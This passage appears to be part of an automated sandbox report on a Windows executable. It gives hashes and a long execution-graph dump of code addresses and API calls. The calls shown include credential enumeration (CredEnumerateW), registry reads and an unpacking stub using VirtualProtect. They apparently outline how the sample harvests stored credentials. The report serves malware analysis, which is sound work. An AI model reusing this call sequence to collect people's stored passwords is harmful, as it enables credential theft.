                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1961120804-0
                                                                                                                                                                • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                                                                                • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                                                                • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                                                                                • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:2.4%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:19.9%
                                                                                                                                                                Signature Coverage:0.5%
                                                                                                                                                                Total number of Nodes:869
                                                                                                                                                                Total number of Limit Nodes:21
                                                                                                                                                                execution_graph 34105 40fc40 70 API calls 34278 403640 21 API calls 34106 427fa4 42 API calls 34279 412e43 _endthreadex 34280 425115 76 API calls 34281 43fe40 133 API calls 34109 425115 83 API calls 34110 401445 memcpy memcpy DialogBoxParamA 34111 440c40 34 API calls 34113 411853 RtlInitializeCriticalSection memset 34114 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34287 40a256 13 API calls 34289 432e5b 17 API calls 34291 43fa5a 20 API calls 34116 401060 41 API calls 34294 427260 CloseHandle memset memset 33171 410c68 FindResourceA 33172 410c81 SizeofResource 33171->33172 33175 410cae 33171->33175 33173 410c92 LoadResource 33172->33173 33172->33175 33174 410ca0 LockResource 33173->33174 33173->33175 33174->33175 34296 405e69 14 API calls 34121 433068 15 API calls 34298 414a6d 18 API calls 34299 43fe6f 134 API calls 34123 424c6d 15 API calls 34300 426741 19 API calls 34125 440c70 17 API calls 34126 443c71 44 API calls 34129 427c79 24 API calls 34303 416e7e memset 34133 42800b 47 API calls 34134 425115 85 API calls 34306 41960c 61 API calls 34135 43f40c 122 API calls 34138 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34139 43f81a 20 API calls 34141 414c20 memset memset 34142 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34310 414625 18 API calls 34311 404225 modf 34312 403a26 strlen WriteFile 34314 40422a 12 API calls 34318 427632 memset memset memcpy 34319 40ca30 59 API calls 34320 404235 26 API calls 34143 42ec34 61 API calls 34144 425115 76 API calls 34321 425115 77 API calls 34323 44223a 38 API calls 34150 43183c 112 API calls 34324 44b2c5 _onexit __dllonexit 34329 42a6d2 memcpy 34152 405cda 65 API calls 34337 43fedc 138 API calls 34338 4116e1 16 API calls 34155 4244e6 19 API calls 34157 42e8e8 127 API calls 34158 4118ee RtlLeaveCriticalSection 34343 43f6ec 22 API calls 34160 425115 119 API calls 33161 410cf3 EnumResourceNamesA 34346 4492f0 memcpy memcpy 34348 43fafa 18 API calls 34350 4342f9 15 API calls 34161 4144fd 19 API calls 34352 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34353 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34356 443a84 _mbscpy 34358 43f681 17 API calls 34164 404487 22 API calls 34360 415e8c 16 API calls 34168 411893 RtlDeleteCriticalSection 34169 41a492 42 API calls 34364 403e96 34 API calls 34365 410e98 memset SHGetPathFromIDList SendMessageA 34171 426741 109 API calls 34172 4344a2 18 API calls 34173 4094a2 10 API calls 34368 4116a6 15 API calls 34369 43f6a4 17 API calls 34370 440aa3 20 API calls 34372 427430 45 API calls 34176 4090b0 7 API calls 34177 4148b0 15 API calls 34179 4118b4 RtlEnterCriticalSection 34180 4014b7 CreateWindowExA 34181 40c8b8 19 API calls 34183 4118bf RtlTryEnterCriticalSection 34377 42434a 18 API calls 34379 405f53 12 API calls 34191 43f956 59 API calls 34193 40955a 17 API calls 34194 428561 36 API calls 34195 409164 7 API calls 34383 404366 19 API calls 34387 40176c ExitProcess 34390 410777 42 API calls 34200 40dd7b 51 API calls 34201 425d7c 16 API calls 34392 43f6f0 25 API calls 34393 42db01 22 API calls 34202 412905 15 API calls 34394 403b04 54 API calls 34395 405f04 SetDlgItemTextA GetDlgItemTextA 34396 44b301 ??3@YAXPAX 34399 4120ea 14 API calls 34400 40bb0a 8 API calls 34402 413f11 strcmp 34206 434110 17 API calls 34209 425115 108 API calls 34403 444b11 _onexit 34211 425115 76 API calls 34214 429d19 10 API calls 34406 444b1f __dllonexit 34407 409f20 _strcmpi 34216 42b927 31 API calls 34410 433f26 19 API calls 34411 44b323 FreeLibrary 34412 427f25 46 API calls 34413 43ff2b 17 API calls 34414 43fb30 19 API calls 34223 414d36 16 API calls 34225 40ad38 7 API calls 34416 433b38 16 API calls 34096 44b33b 34097 44b344 ??3@YAXPAX 34096->34097 34098 44b34b 34096->34098 34097->34098 34099 44b354 ??3@YAXPAX 34098->34099 34100 44b35b 34098->34100 34099->34100 34101 44b364 ??3@YAXPAX 34100->34101 34102 44b36b 34100->34102 34101->34102 34103 44b374 ??3@YAXPAX 34102->34103 34104 44b37b 34102->34104 34103->34104 34229 426741 21 API calls 34230 40c5c3 125 API calls 34232 43fdc5 17 API calls 34417 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34235 4161cb memcpy memcpy memcpy memcpy 33176 44b3cf 33177 44b3e6 33176->33177 33183 44b454 33176->33183 33177->33183 33189 44b40e GetModuleHandleA 33177->33189 33179 44b45d GetModuleHandleA 33182 44b467 33179->33182 33180 44b49a 33202 44b49f 33180->33202 33182->33183 33184 44b487 GetProcAddress 33182->33184 33183->33179 33183->33180 33183->33182 33184->33183 33185 44b405 33185->33182 33185->33183 33186 44b428 GetProcAddress 33185->33186 33186->33183 33187 44b435 VirtualProtect 33186->33187 33187->33183 33188 44b444 VirtualProtect 33187->33188 33188->33183 33190 44b417 33189->33190 33196 44b454 33189->33196 33221 44b42b GetProcAddress 33190->33221 33192 44b41c 33192->33196 33197 44b428 GetProcAddress 33192->33197 33193 44b45d GetModuleHandleA 33199 44b467 33193->33199 33194 44b49a 33195 44b49f 773 API calls 33194->33195 33195->33194 33196->33193 33196->33194 33196->33199 33197->33196 33198 44b435 VirtualProtect 33197->33198 33198->33196 33200 44b444 VirtualProtect 33198->33200 33199->33196 33201 44b487 GetProcAddress 33199->33201 33200->33196 33201->33196 33203 444c4a 33202->33203 33204 444c56 GetModuleHandleA 33203->33204 33205 444c68 __set_app_type __p__fmode __p__commode 33204->33205 33207 444cfa 33205->33207 33208 444d02 __setusermatherr 33207->33208 33209 444d0e 33207->33209 33208->33209 33230 444e22 _controlfp 33209->33230 33211 444d13 _initterm __getmainargs _initterm 33212 444d6a GetStartupInfoA 33211->33212 33214 444d9e GetModuleHandleA 33212->33214 33231 40cf44 33214->33231 33218 444dcf _cexit 33220 444e04 33218->33220 33219 444dc8 exit 33219->33218 33220->33180 33222 44b454 33221->33222 33223 44b435 VirtualProtect 33221->33223 33225 44b45d GetModuleHandleA 33222->33225 33226 44b49a 33222->33226 33223->33222 33224 44b444 VirtualProtect 33223->33224 33224->33222 33229 44b467 33225->33229 33227 44b49f 773 API calls 33226->33227 33227->33226 33228 44b487 GetProcAddress 33228->33229 33229->33222 33229->33228 33230->33211 33282 404a99 LoadLibraryA 33231->33282 33233 40cf60 33267 40cf64 33233->33267 33289 410d0e 33233->33289 33235 40cf6f 33293 40ccd7 ??2@YAPAXI 33235->33293 33237 40cf9b 33307 407cbc 33237->33307 33242 40cfc4 33325 409825 memset 33242->33325 33243 40cfd8 33330 4096f4 memset 33243->33330 33248 407e30 _strcmpi 33250 40cfee 33248->33250 33249 40d181 ??3@YAXPAX 33251 40d1b3 33249->33251 33252 40d19f DeleteObject 33249->33252 33254 40cff2 RegDeleteKeyA 33250->33254 33255 40d007 EnumResourceTypesA 33250->33255 33354 407948 ??3@YAXPAX ??3@YAXPAX 33251->33354 33252->33251 33254->33249 33257 40d047 33255->33257 33258 40d02f MessageBoxA 33255->33258 33256 40d1c4 33355 4080d4 ??3@YAXPAX 33256->33355 33260 40d0a0 CoInitialize 33257->33260 33335 40ce70 33257->33335 33258->33249 33352 40cc26 strncat memset RegisterClassA CreateWindowExA 33260->33352 33261 40d1cd 33356 407948 ??3@YAXPAX ??3@YAXPAX 33261->33356 33266 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33353 40c256 PostMessageA 33266->33353 33267->33218 33267->33219 33268 40d061 ??3@YAXPAX 33268->33251 33272 40d084 DeleteObject 33268->33272 33269 40d09e 33269->33260 33272->33251 33274 40d0f9 GetMessageA 33275 40d17b 33274->33275 33276 40d10d 33274->33276 33275->33249 33277 40d113 TranslateAccelerator 33276->33277 33279 40d145 IsDialogMessage 33276->33279 33280 40d139 IsDialogMessage 33276->33280 33277->33276 33278 40d16d GetMessageA 33277->33278 33278->33275 33278->33277 33279->33278 33281 40d157 TranslateMessage DispatchMessageA 33279->33281 33280->33278 33280->33279 33281->33278 33283 404ac4 GetProcAddress 33282->33283 33285 404ae8 33282->33285 33284 404add FreeLibrary 33283->33284 33286 404ad4 33283->33286 33284->33285 33287 404b13 33285->33287 33288 404afc MessageBoxA 33285->33288 33286->33284 33287->33233 33288->33233 33290 410d17 LoadLibraryA 33289->33290 33291 410d3c 33289->33291 33290->33291 33292 410d2b GetProcAddress 33290->33292 33291->33235 33292->33291 33294 40cd08 ??2@YAPAXI 33293->33294 33296 40cd26 33294->33296 33297 40cd2d 33294->33297 33364 404025 6 API calls 33296->33364 33299 40cd66 33297->33299 33300 40cd59 DeleteObject 33297->33300 33357 407088 33299->33357 33300->33299 33302 40cd6b 33360 4019b5 33302->33360 33305 4019b5 strncat 33306 40cdbf _mbscpy 33305->33306 33306->33237 33366 407948 ??3@YAXPAX ??3@YAXPAX 33307->33366 33309 407cf7 33312 407ddc 33309->33312 33313 407a1f malloc memcpy ??3@YAXPAX ??3@YAXPAX 33309->33313 33315 407d7a ??3@YAXPAX 33309->33315 33320 407e04 33309->33320 33370 40796e 7 API calls 33309->33370 33371 406f30 33309->33371 33312->33320 33379 407a1f 33312->33379 33313->33309 33315->33309 33367 407a55 33320->33367 33321 407e30 33322 407e57 33321->33322 33323 407e38 33321->33323 33322->33242 33322->33243 33323->33322 33324 407e41 _strcmpi 33323->33324 33324->33322 33324->33323 33385 4097ff 33325->33385 33327 409854 33390 409731 33327->33390 33331 4097ff 3 API calls 33330->33331 33332 409723 33331->33332 33410 40966c 33332->33410 33424 4023b2 33335->33424 33341 40ced3 33513 40cdda 7 API calls 33341->33513 33342 40cece 33345 40cf3f 33342->33345 33465 40c3d0 memset GetModuleFileNameA strrchr 33342->33465 33345->33268 33345->33269 33348 40ceed 33492 40affa 33348->33492 33352->33266 33353->33274 33354->33256 33355->33261 33356->33267 33365 406fc7 memset _mbscpy 33357->33365 33359 40709f CreateFontIndirectA 33359->33302 33361 4019e1 33360->33361 33362 4019c2 strncat 33361->33362 33363 4019e5 memset LoadIconA 33361->33363 33362->33361 33363->33305 33364->33297 33365->33359 33366->33309 33368 407a65 33367->33368 33369 407a5b ??3@YAXPAX 33367->33369 33368->33321 33369->33368 33370->33309 33372 406f37 malloc 33371->33372 33373 406f7d 33371->33373 33375 406f73 33372->33375 33376 406f58 33372->33376 33373->33309 33375->33309 33377 406f6c ??3@YAXPAX 33376->33377 33378 406f5c memcpy 33376->33378 33377->33375 33378->33377 33380 407a38 33379->33380 33381 407a2d ??3@YAXPAX 33379->33381 33383 406f30 3 API calls 33380->33383 33382 407a43 33381->33382 33384 40796e 7 API calls 33382->33384 33383->33382 33384->33320 33401 406f96 GetModuleFileNameA 33385->33401 33387 409805 strrchr 33388 409814 33387->33388 33389 409817 _mbscat 33387->33389 33388->33389 33389->33327 33402 44b090 33390->33402 33395 40930c 3 API calls 33396 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33395->33396 33397 4097c5 LoadStringA 33396->33397 33398 4097db 33397->33398 33398->33397 33400 4097f3 33398->33400 33409 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33398->33409 33400->33249 33401->33387 33403 40973e _mbscpy _mbscpy 33402->33403 33404 40930c 33403->33404 33405 44b090 33404->33405 33406 409319 memset GetPrivateProfileStringA 33405->33406 33407 409374 33406->33407 33408 409364 WritePrivateProfileStringA 33406->33408 33407->33395 33408->33407 33409->33398 33420 406f81 GetFileAttributesA 33410->33420 33412 409675 33413 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33412->33413 33419 4096ee 33412->33419 33421 409278 GetPrivateProfileStringA 33413->33421 33415 4096c9 33422 409278 GetPrivateProfileStringA 33415->33422 33417 4096da 33423 409278 GetPrivateProfileStringA 33417->33423 33419->33248 33420->33412 33421->33415 33422->33417 33423->33419 33515 409c1c 33424->33515 33427 401e69 memset 33554 410dbb 33427->33554 33430 401ec2 33584 4070e3 strlen _mbscat _mbscpy _mbscat 33430->33584 33431 401ed4 33569 406f81 GetFileAttributesA 33431->33569 33434 401ee6 strlen strlen 33436 401f15 33434->33436 33437 401f28 33434->33437 33585 4070e3 strlen _mbscat _mbscpy _mbscat 33436->33585 33570 406f81 GetFileAttributesA 33437->33570 33440 401f35 33571 401c31 33440->33571 33443 401f75 33583 410a9c RegOpenKeyExA 33443->33583 33444 401c31 7 API calls 33444->33443 33446 401f91 33447 402187 33446->33447 33448 401f9c memset 33446->33448 33449 402195 ExpandEnvironmentStringsA 33447->33449 33450 4021a8 _strcmpi 33447->33450 33586 410b62 RegEnumKeyExA 33448->33586 33595 406f81 GetFileAttributesA 33449->33595 33450->33341 33450->33342 33453 40217e RegCloseKey 33453->33447 33454 401fd9 atoi 33455 401fef memset memset sprintf 33454->33455 33462 401fc9 33454->33462 33587 410b1e 33455->33587 33458 402165 33458->33453 33459 402076 memset memset strlen strlen 33459->33462 33460 4020dd strlen strlen 33460->33462 33461 4070e3 strlen _mbscat _mbscpy _mbscat 33461->33462 33462->33453 33462->33454 33462->33458 33462->33459 33462->33460 33462->33461 33463 406f81 GetFileAttributesA 33462->33463 33464 402167 _mbscpy 33462->33464 33594 410b62 RegEnumKeyExA 33462->33594 33463->33462 33464->33453 33466 40c422 33465->33466 33467 40c425 _mbscat _mbscpy _mbscpy 33465->33467 33466->33467 33468 40c49d 33467->33468 33469 40c512 33468->33469 33470 40c502 GetWindowPlacement 33468->33470 33471 40c538 33469->33471 33616 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33469->33616 33470->33469 33609 409b31 33471->33609 33475 40ba28 33476 40ba87 33475->33476 33480 40ba3c 33475->33480 33619 406c62 LoadCursorA SetCursor 33476->33619 33478 40ba43 _mbsicmp 33478->33480 33479 40ba8c 33620 4107f1 33479->33620 33623 404734 33479->33623 33631 410a9c RegOpenKeyExA 33479->33631 33632 404785 33479->33632 33635 403c16 33479->33635 33480->33476 33480->33478 33711 40b5e5 10 API calls 33480->33711 33481 40baa0 33482 407e30 _strcmpi 33481->33482 33483 40bab0 33482->33483 33484 40bafa SetCursor 33483->33484 33486 40baf1 qsort 33483->33486 33484->33348 33486->33484 34071 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33492->34071 33494 40b00e 33495 40b016 33494->33495 33496 40b01f GetStdHandle 33494->33496 34072 406d1a CreateFileA 33495->34072 33498 40b01c 33496->33498 33499 40b035 33498->33499 33500 40b12d 33498->33500 34073 406c62 LoadCursorA SetCursor 33499->34073 34077 406d77 9 API calls 33500->34077 33503 40b136 33514 40c580 28 API calls 33503->33514 33504 40b087 33511 40b0a1 33504->33511 34075 40a699 12 API calls 33504->34075 33505 40b042 33505->33504 33505->33511 34074 40a57c strlen WriteFile 33505->34074 33508 40b0d6 33509 40b116 CloseHandle 33508->33509 33510 40b11f SetCursor 33508->33510 33509->33510 33510->33503 33511->33508 34076 406d77 9 API calls 33511->34076 33513->33342 33514->33345 33527 409a32 33515->33527 33518 409c80 memcpy memcpy 33519 409cda 33518->33519 33519->33518 33520 409d18 ??2@YAPAXI ??2@YAPAXI 33519->33520 33522 408db6 12 API calls 33519->33522 33521 409d54 ??2@YAPAXI 33520->33521 33525 409d8b 33520->33525 33521->33525 33522->33519 33525->33525 33537 409b9c 33525->33537 33526 4023c1 33526->33427 33528 409a44 33527->33528 33529 409a3d ??3@YAXPAX 33527->33529 33530 409a52 33528->33530 33531 409a4b ??3@YAXPAX 33528->33531 33529->33528 33532 409a5c ??3@YAXPAX 33530->33532 33534 409a63 33530->33534 33531->33530 33532->33534 33533 409a83 ??2@YAPAXI ??2@YAPAXI 33533->33518 33534->33533 33535 409a73 ??3@YAXPAX 33534->33535 33536 409a7c ??3@YAXPAX 33534->33536 33535->33536 33536->33533 33538 407a55 ??3@YAXPAX 33537->33538 33539 409ba5 33538->33539 33540 407a55 ??3@YAXPAX 33539->33540 33541 409bad 33540->33541 33542 407a55 ??3@YAXPAX 33541->33542 33543 409bb5 33542->33543 33544 407a55 ??3@YAXPAX 33543->33544 33545 409bbd 33544->33545 33546 407a1f 4 API calls 33545->33546 33547 409bd0 33546->33547 33548 407a1f 4 API calls 33547->33548 33549 409bda 33548->33549 33550 407a1f 4 API calls 33549->33550 33551 409be4 33550->33551 33552 407a1f 4 API calls 33551->33552 33553 409bee 33552->33553 33553->33526 33555 410d0e 2 API calls 33554->33555 33556 410dca 33555->33556 33557 410dfd memset 33556->33557 33596 4070ae 33556->33596 33558 410e1d 33557->33558 33599 410a9c RegOpenKeyExA 33558->33599 33562 401e9e strlen strlen 33562->33430 33562->33431 33563 410e4a 33564 410e7f _mbscpy 33563->33564 33600 410d3d _mbscpy 33563->33600 33564->33562 33566 410e5b 33601 410add RegQueryValueExA 33566->33601 33568 410e73 RegCloseKey 33568->33564 33569->33434 33570->33440 33602 410a9c RegOpenKeyExA 33571->33602 33573 401c4c 33574 401cad 33573->33574 33603 410add RegQueryValueExA 33573->33603 33574->33443 33574->33444 33576 401c6a 33577 401c71 strchr 33576->33577 33578 401ca4 RegCloseKey 33576->33578 33577->33578 33579 401c85 strchr 33577->33579 33578->33574 33579->33578 33580 401c94 33579->33580 33604 406f06 strlen 33580->33604 33582 401ca1 33582->33578 33583->33446 33584->33431 33585->33437 33586->33462 33607 410a9c RegOpenKeyExA 33587->33607 33589 410b34 33590 410b5d 33589->33590 33608 410add RegQueryValueExA 33589->33608 33590->33462 33592 410b4c RegCloseKey 33592->33590 33594->33462 33595->33450 33597 4070bd GetVersionExA 33596->33597 33598 4070ce 33596->33598 33597->33598 33598->33557 33598->33562 33599->33563 33600->33566 33601->33568 33602->33573 33603->33576 33605 406f17 33604->33605 33606 406f1a memcpy 33604->33606 33605->33606 33606->33582 33607->33589 33608->33592 33610 409b40 33609->33610 33612 409b4e 33609->33612 33617 409901 memset SendMessageA 33610->33617 33613 409b99 33612->33613 33614 409b8b 33612->33614 33613->33475 33618 409868 SendMessageA 33614->33618 33616->33471 33617->33612 33618->33613 33619->33479 33621 410807 33620->33621 33622 4107fc FreeLibrary 33620->33622 33621->33481 33622->33621 33624 404785 FreeLibrary 33623->33624 33625 40473b LoadLibraryA 33624->33625 33626 40474c GetProcAddress 33625->33626 33627 40476e 33625->33627 33626->33627 33628 404764 33626->33628 33629 404781 33627->33629 33630 404785 FreeLibrary 33627->33630 33628->33627 33629->33481 33630->33629 33631->33481 33633 4047a3 33632->33633 33634 404799 FreeLibrary 33632->33634 33633->33481 33634->33633 33636 4107f1 FreeLibrary 33635->33636 33637 403c30 LoadLibraryA 33636->33637 33638 403c74 33637->33638 33639 403c44 GetProcAddress 33637->33639 33641 4107f1 FreeLibrary 33638->33641 33639->33638 33640 403c5e 33639->33640 33640->33638 33644 403c6b 33640->33644 33642 403c7b 33641->33642 33643 404734 3 API calls 33642->33643 33645 403c86 33643->33645 33644->33642 33712 4036e5 33645->33712 33648 4036e5 26 API calls 33649 403c9a 33648->33649 33650 4036e5 26 API calls 33649->33650 33651 403ca4 33650->33651 33652 4036e5 26 API calls 33651->33652 33653 403cae 33652->33653 33724 4085d2 33653->33724 33661 403ce5 33662 403cf7 33661->33662 33907 402bd1 39 API calls 33661->33907 33772 410a9c RegOpenKeyExA 33662->33772 33665 403d0a 33666 403d1c 33665->33666 33908 402bd1 39 API calls 33665->33908 33773 402c5d 33666->33773 33670 4070ae GetVersionExA 33671 403d31 33670->33671 33791 410a9c RegOpenKeyExA 33671->33791 33673 403d51 33674 403d61 33673->33674 33909 402b22 46 API calls 33673->33909 33792 410a9c RegOpenKeyExA 33674->33792 33677 403d87 33678 403d97 33677->33678 33910 402b22 46 API calls 33677->33910 33793 410a9c RegOpenKeyExA 33678->33793 33681 403dbd 33682 403dcd 33681->33682 33911 402b22 46 API calls 33681->33911 33794 410808 33682->33794 33686 404785 FreeLibrary 33687 403de8 33686->33687 33798 402fdb 33687->33798 33690 402fdb 34 API calls 33691 403e00 33690->33691 33814 4032b7 33691->33814 33700 403e3b 33702 403e73 33700->33702 33703 403e46 _mbscpy 33700->33703 33861 40fb00 33702->33861 33913 40f334 334 API calls 33703->33913 33711->33480 33713 4037c5 33712->33713 33714 4036fb 33712->33714 33713->33648 33914 410863 UuidFromStringA UuidFromStringA memcpy 33714->33914 33716 40370e 33716->33713 33717 403716 strchr 33716->33717 33717->33713 33718 403730 33717->33718 33915 4021b6 memset 33718->33915 33720 40373f _mbscpy _mbscpy strlen 33721 4037a4 _mbscpy 33720->33721 33722 403789 sprintf 33720->33722 33916 4023e5 16 API calls 33721->33916 33722->33721 33725 4085e2 33724->33725 33917 4082cd 11 API calls 33725->33917 33729 408600 33730 403cba 33729->33730 33731 40860b memset 33729->33731 33742 40821d 33730->33742 33920 410b62 RegEnumKeyExA 33731->33920 33733 408637 33734 4086d2 RegCloseKey 33733->33734 33736 40865c memset 33733->33736 33921 410a9c RegOpenKeyExA 33733->33921 33924 410b62 RegEnumKeyExA 33733->33924 33734->33730 33922 410add RegQueryValueExA 33736->33922 33739 408694 33923 40848b 10 API calls 33739->33923 33741 4086ab RegCloseKey 33741->33733 33925 410a9c RegOpenKeyExA 33742->33925 33744 40823f 33745 403cc6 33744->33745 33746 408246 memset 33744->33746 33754 4086e0 33745->33754 33926 410b62 RegEnumKeyExA 33746->33926 33748 4082bf RegCloseKey 33748->33745 33750 40826f 33750->33748 33927 410a9c RegOpenKeyExA 33750->33927 33928 4080ed 11 API calls 33750->33928 33929 410b62 RegEnumKeyExA 33750->33929 33753 4082a2 RegCloseKey 33753->33750 33930 4045db 33754->33930 33758 40872d 33760 408737 wcslen 33758->33760 33762 4088ef 33758->33762 33760->33762 33768 40876a 33760->33768 33761 40872b CredEnumerateW 33761->33758 33938 404656 33762->33938 33763 40877a _wcsncoll 33763->33768 33765 404734 3 API calls 33765->33768 33766 404785 FreeLibrary 33766->33768 33767 408812 memset 33767->33768 33769 40883c memcpy wcschr 33767->33769 33768->33762 33768->33763 33768->33765 33768->33766 33768->33767 33768->33769 33770 4088c3 LocalFree 33768->33770 33941 40466b _mbscpy 33768->33941 33769->33768 33770->33768 33771 410a9c RegOpenKeyExA 33771->33661 33772->33665 33942 410a9c RegOpenKeyExA 33773->33942 33775 402c7a 33776 402da5 33775->33776 33777 402c87 memset 33775->33777 33776->33670 33943 410b62 RegEnumKeyExA 33777->33943 33779 402d9c RegCloseKey 33779->33776 33780 410b1e 3 API calls 33781 402ce4 memset sprintf 33780->33781 33944 410a9c RegOpenKeyExA 33781->33944 33783 402d28 33784 402d3a sprintf 33783->33784 33945 402bd1 39 API calls 33783->33945 33946 410a9c RegOpenKeyExA 33784->33946 33789 402cb2 33789->33779 33789->33780 33790 402d9a 33789->33790 33947 402bd1 39 API calls 33789->33947 33948 410b62 RegEnumKeyExA 33789->33948 33790->33779 33791->33673 33792->33677 33793->33681 33797 410816 33794->33797 33795 4107f1 FreeLibrary 33796 403ddd 33795->33796 33796->33686 33797->33795 33949 410a9c RegOpenKeyExA 33798->33949 33800 402ff9 33801 403006 memset 33800->33801 33802 40312c 33800->33802 33950 410b62 RegEnumKeyExA 33801->33950 33802->33690 33804 403122 RegCloseKey 33804->33802 33805 410b1e 3 API calls 33806 403058 memset sprintf 33805->33806 33951 410a9c RegOpenKeyExA 33806->33951 33808 403033 33808->33804 33808->33805 33809 4030a2 memset 33808->33809 33811 4030f9 RegCloseKey 33808->33811 33813 410b62 RegEnumKeyExA 33808->33813 33953 402db3 26 API calls 33808->33953 33952 410b62 RegEnumKeyExA 33809->33952 33811->33808 33813->33808 33815 4032d5 33814->33815 33816 4033a9 33814->33816 33954 4021b6 memset 33815->33954 33829 4034e4 memset memset 33816->33829 33818 4032e1 33955 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33818->33955 33820 4032ea 33821 4032f8 memset GetPrivateProfileSectionA 33820->33821 33956 4023e5 16 API calls 33820->33956 33821->33816 33826 40332f 33821->33826 33823 40339b strlen 33823->33816 33823->33826 33825 403350 strchr 33825->33826 33826->33816 33826->33823 33957 4021b6 memset 33826->33957 33958 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33826->33958 33959 4023e5 16 API calls 33826->33959 33830 410b1e 3 API calls 33829->33830 33831 40353f 33830->33831 33832 40357f 33831->33832 33833 403546 _mbscpy 33831->33833 33837 403985 33832->33837 33960 406d55 strlen _mbscat 33833->33960 33835 403565 _mbscat 33961 4033f0 19 API calls 33835->33961 33962 40466b _mbscpy 33837->33962 33841 4039aa 33843 4039ff 33841->33843 33963 40f460 memset memset 33841->33963 33984 40f6e2 33841->33984 34000 4038e8 21 API calls 33841->34000 33844 404785 FreeLibrary 33843->33844 33845 403a0b 33844->33845 33846 4037ca memset memset 33845->33846 34008 444551 memset 33846->34008 33849 4038e2 33849->33700 33912 40f334 334 API calls 33849->33912 33851 40382e 33852 406f06 2 API calls 33851->33852 33853 403843 33852->33853 33854 406f06 2 API calls 33853->33854 33855 403855 strchr 33854->33855 33856 403884 _mbscpy 33855->33856 33857 403897 strlen 33855->33857 33858 4038bf _mbscpy 33856->33858 33857->33858 33859 4038a4 sprintf 33857->33859 34020 4023e5 16 API calls 33858->34020 33859->33858 33862 44b090 33861->33862 33863 40fb10 RegOpenKeyExA 33862->33863 33864 403e7f 33863->33864 33865 40fb3b RegOpenKeyExA 33863->33865 33875 40f96c 33864->33875 33866 40fb55 RegQueryValueExA 33865->33866 33867 40fc2d RegCloseKey 33865->33867 33868 40fc23 RegCloseKey 33866->33868 33869 40fb84 33866->33869 33867->33864 33868->33867 33870 404734 3 API calls 33869->33870 33871 40fb91 33870->33871 33871->33868 33872 40fc19 LocalFree 33871->33872 33873 40fbdd memcpy memcpy 33871->33873 33872->33868 34025 40f802 11 API calls 33873->34025 33876 4070ae GetVersionExA 33875->33876 33877 40f98d 33876->33877 33878 4045db 7 API calls 33877->33878 33882 40f9a9 33878->33882 33879 40fae6 33880 404656 FreeLibrary 33879->33880 33881 403e85 33880->33881 33887 4442ea memset 33881->33887 33882->33879 33883 40fa13 memset WideCharToMultiByte 33882->33883 33883->33882 33884 40fa43 _strnicmp 33883->33884 33884->33882 33885 40fa5b WideCharToMultiByte 33884->33885 33885->33882 33886 40fa88 WideCharToMultiByte 33885->33886 33886->33882 33888 410dbb 9 API calls 33887->33888 33889 444329 33888->33889 34026 40759e strlen strlen 33889->34026 33894 410dbb 9 API calls 33895 444350 33894->33895 33896 40759e 3 API calls 33895->33896 33897 44435a 33896->33897 33898 444212 65 API calls 33897->33898 33899 444366 memset memset 33898->33899 33900 410b1e 3 API calls 33899->33900 33901 4443b9 ExpandEnvironmentStringsA strlen 33900->33901 33902 4443f4 _strcmpi 33901->33902 33903 4443e5 33901->33903 33904 403e91 33902->33904 33905 44440c 33902->33905 33903->33902 33904->33481 33906 444212 65 API calls 33905->33906 33906->33904 33907->33662 33908->33666 33909->33674 33910->33678 33911->33682 33912->33700 33913->33702 33914->33716 33915->33720 33916->33713 33918 40841c 33917->33918 33919 410a9c RegOpenKeyExA 33918->33919 33919->33729 33920->33733 33921->33733 33922->33739 33923->33741 33924->33733 33925->33744 33926->33750 33927->33750 33928->33753 33929->33750 33931 404656 FreeLibrary 33930->33931 33932 4045e3 LoadLibraryA 33931->33932 33933 404651 33932->33933 33934 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33932->33934 33933->33758 33933->33761 33933->33762 33935 40463d 33934->33935 33936 404643 33935->33936 33937 404656 FreeLibrary 33935->33937 33936->33933 33937->33933 33939 403cd2 33938->33939 33940 40465c FreeLibrary 33938->33940 33939->33771 33940->33939 33941->33768 33942->33775 33943->33789 33944->33783 33945->33784 33946->33789 33947->33789 33948->33789 33949->33800 33950->33808 33951->33808 33952->33808 33953->33808 33954->33818 33955->33820 33956->33821 33957->33825 33958->33826 33959->33826 33960->33835 33961->33832 33962->33841 34001 4078ba 33963->34001 33966 4078ba _mbsnbcat 33967 40f5a3 RegOpenKeyExA 33966->33967 33968 40f5c3 RegQueryValueExA 33967->33968 33969 40f6d9 33967->33969 33970 40f6d0 RegCloseKey 33968->33970 33971 40f5f0 33968->33971 33969->33841 33970->33969 33971->33970 33972 40f675 33971->33972 34005 40466b _mbscpy 33971->34005 33972->33970 34006 4012ee strlen 33972->34006 33974 40f611 33976 404734 3 API calls 33974->33976 33981 40f616 33976->33981 33977 40f69e RegQueryValueExA 33977->33970 33978 40f6c1 33977->33978 